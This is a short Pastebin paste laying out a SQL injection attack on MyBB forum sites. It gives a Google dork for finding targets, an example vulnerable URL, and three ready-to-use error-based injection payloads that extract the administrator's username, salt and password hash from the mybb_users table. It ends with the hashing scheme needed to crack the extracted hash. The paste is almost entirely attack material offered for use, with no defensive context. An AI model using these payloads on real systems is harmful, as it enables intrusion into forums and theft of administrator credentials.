Guest User

Untitled

a guest
Oct 1st, 2018
476
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. Google Dork: inurl:"index.php?tab=" intext:"MyBB"
  2.  
  3. Example URL: Target.com/index.php?tab=8'
  4.  
  5. GetUsername: and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
  6.  
  7. Get_SALT: and(select 1 from(select count(*),concat((select salt from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
  8.  
  9. Get Password: and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
  10.  
  11. Encryption Tpye: md5(md5($salt).md5($pass))c.
Add Comment
Please, Sign In to add comment